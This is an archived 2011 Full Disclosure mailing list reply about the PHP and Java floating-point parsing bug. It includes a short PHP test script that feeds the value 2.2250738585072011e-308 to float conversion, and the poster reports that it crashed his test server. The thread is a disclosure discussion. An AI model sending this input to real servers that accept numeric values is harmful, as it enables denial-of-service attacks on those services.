Full Disclosure mailing list archives
Re: {Java,PHP} Server Exploits
From: Christian Sciberras <uuf6429 () gmail com>
Date: Wed, 9 Feb 2011 20:56:40 +0100
Ah, been reading more about it, seems it was fixed. Still, there should have been safeguards around this - I'm thinking they should check existing conversion routines to ensure they're safe... On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras <uuf6429 () gmail com>wrote:
Was it fixed? What's the current status? The sounds like a major issue, and the lack of info about it is darn impressive. I tried it on my test Windows WAMP server: <?php ob_implicit_flush(true); echo 'Start test...<br/>'; $f=(float)"2.2250738585072011e-308"; echo 'Try 1 => '.$f.'</br>'; $f=floatval("2.2250738585072011e-308"); echo 'Try 2 => '.$f.'</br>'; $f="2.2250738585072011e-308"; echo 'Try 3 => '.(float)$f.'</br>'; echo 'Test failed, server not vulnerable!</br>'; ?> All three tests succeeded in crashing the server. With all due respect, this should NOT have been disclosed without being FIXED (as it seems to me). Plus, I'm a bit amazed such a bug exists in PHP - since converting to floating point is a trivial operation, it should have been limited and safe-guarded from the start. There are a lot of servers out there happily accepting input as floating point values, this bug should be top priority... Chris. On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser <literalka () gmail com> wrote:http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server<http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Servers> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- {Java,PHP} Server Exploits Leon Kaiser (Feb 09)
- Re: {Java,PHP} Server Exploits Christian Sciberras (Feb 09)
- Re: {Java,PHP} Server Exploits Christian Sciberras (Feb 09)
- Re: {Java,PHP} Server Exploits Cal Leeming [Simplicity Media Ltd] (Feb 09)
- Re: {Java,PHP} Server Exploits Valdis . Kletnieks (Feb 09)
- Re: {Java,PHP} Server Exploits Christian Sciberras (Feb 09)
- Re: {Java,PHP} Server Exploits Christian Sciberras (Feb 09)
- Re: {Java,PHP} Server Exploits DiKKy Heartiez (Feb 09)
- Re: {Java,PHP} Server Exploits Troy Aerojam (Feb 09)
- Re: {Java,PHP} Server Exploits Yorian Wiltjer (Feb 10)
- Re: {Java,PHP} Server Exploits Christian Sciberras (Feb 09)